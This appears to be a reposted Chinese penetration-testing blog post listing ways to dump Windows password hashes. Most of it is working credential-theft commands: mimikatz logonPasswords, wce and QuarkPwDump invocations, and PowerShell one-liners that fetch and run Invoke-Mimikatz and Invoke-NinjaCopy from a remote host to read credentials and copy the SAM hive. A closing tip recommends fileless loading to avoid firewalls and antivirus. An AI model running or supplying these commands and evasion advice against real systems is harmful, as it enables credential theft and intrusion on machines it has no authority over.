碼上歡樂
相關內容    簡體    繁體

windows下hash抓取的幾種方式

本文轉載自   查看原文   2020-08-04 14:33   896    滲透技巧/ 內網滲透

前提:在滲透測試過程中,對於windows系統的機器滲透需要注意hash的獲取,其中hash分為LM-HASH與NTLM-HASH,在windows系統中,hash的默認存儲位置為: C:\Windows\System32\config\SAM

各種工具:

  • mimikatz 
  • privilege::debug 
    sekurlsa::logonPasswords
  • wce 
  • wce.exe
  • QuarkPwDump  
    QuarkPwDump.exe -dhl
  • powershell腳本: 
    • 使用powersploit中的mimikatz.ps1 
    • mimikatz在線加載: 
      powershell -exec bypass "IEX (New-Object Net.WebClient).DownloadString('http://ip/Invoke-Mimikatz.ps1');Invoke-Mimikatz -Dumpcreds"
    • 本地加載: 
      powershell -exec bypass "import-module Invoke-Mimikatz.ps1;Invoke-Mimikatz -Dumpcreds"

Ninja-copy 在線加載: 

powershell -exec bypass "IEX (New-Object Net.WebClient).DownloadString('http://ip/Invoke-NinjaCopy.ps1');Invoke-NinjaCopy -Path C:\Windows\System32\config\SAM -LocalDestination C:\SAM.txt;"

本地加載: 

powershell -exec bypass "Import-Module .\Invoke-NinjaCopy.ps1;Invoke-NinjaCopy -Path C:\Windows\System32\config\SAM -LocalDestination .\sam.hive"

后記:為防止防火牆,殺軟等工具殺掉ps1腳本,推薦使用在線加載的方式,文件不落地


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 windows中抓取hash小結(下) Charles問題之Windows10下抓取https包 windows下使用wineshark分析抓取本地回環包 GCD下的幾種實現同步的方式 Linux下使用QQ的幾種方式 linux下ssh的幾種驗證方式 利用msf抓取密碼,並用hash登錄 [轉]Windows系統中監控文件復制操作的幾種方式 關於Windows系列密碼抓取 kvm下Windows激活方式小計
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM